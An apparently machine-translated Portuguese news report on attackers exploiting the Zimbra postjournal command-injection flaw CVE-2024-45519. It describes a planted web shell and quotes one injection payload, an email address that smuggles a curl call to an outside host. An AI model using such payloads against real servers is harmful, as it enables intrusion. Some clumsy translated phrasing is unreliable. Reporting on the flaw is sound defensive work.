Pesquisadores de segurança cibernética estão alertando sobre tentativas ativas de exploração visando uma falha de segurança recentemente divulgada na Colaboração Zimbra da Synacor.
A empresa de segurança empresarial Proofpoint disse que começou a monitorar a exploração em 28 de setembro de 2024. O ataque visa explorar CVE-2024-45519, uma falha crítica de segurança em sua funcionalidade pós-data que pode permitir que invasores não autorizados executem comandos arbitrários em um afetado. Instalação do Zimbra.
“E-mails de exploração do Gmail foram enviados para endereços falsos em fóruns CC, na tentativa de fazer com que os servidores Zimbra os processassem e os executassem como comandos”, disse Proofpoint em uma série de postagens no X. “Endereços contêm strings Base64 usadas por sh help.”
O problema crítico foi resolvido pelo Zimbra nas versões 8.8.15 Patch 46, 9.0.0 Patch 41, 10.0.9 e 10.1.1 lançadas em 4 de setembro de 2024. Um pesquisador de segurança chamado lebr0nli (Alan Li) é responsável pela descoberta . e relatar erros.
“Embora o recurso postjournal possa ser opcional ou desabilitado em muitos sistemas, ainda é necessário usar o patch fornecido para evitar possíveis explorações”, disse Ashish Kataria, arquiteto de segurança da Synacor, em comentário em 19 de setembro de 2024.
“Em sistemas Zimbra onde o recurso postjournal não está habilitado e um patch não pode ser aplicado imediatamente, a remoção do binário postjournal pode ser considerada uma medida temporária até que o patch seja aplicado.”
A Proofpoint disse que identificou uma série de endereços CC que, quando decodificados, tentaram gravar um web shell no servidor Zimbra vulnerável no local: “/jetty/webapps/zimbraAdmin/public/jsp/zimbraConfig.jsp.”
O web shell incorporado escuta conexões de entrada com um campo de cookie JSESSIONID predeterminado e, se presente, continua a passar o cookie JACTION para comandos Base64.
O web shell vem com suporte para execução de comandos via exec. Alternativamente, ele pode baixar e executar um arquivo através de uma conexão de soquete. Este ataque não foi atribuído a um ator ou grupo malicioso conhecido no momento da redação deste artigo.
Dito isso, a exploração parece ter começado um dia depois que o Project Discovery divulgou detalhes técnicos da falha, que, segundo ele, “decorre da instalação não autorizada do usuário transferida para uma versão não publicada, permitindo que invasores injetem comandos arbitrariamente”.
O problema da empresa de segurança cibernética baseia-se na forma como o binário postjournal baseado em C manipula e decodifica endereços de e-mail de destinatários em uma função chamada “msg_handler ()”, permitindo assim a injeção de comando em um serviço executado na porta 10027 ao transmitir uma mensagem SMTP especialmente criada. . e um endereço falso (por exemplo, “aabbb$(curl${IFS}oast.me)”@mail.domain.com).
Devido às tentativas ativas de exploração, é altamente recomendável que os usuários usem os patches mais recentes para estarem mais protegidos contra ameaças potenciais.
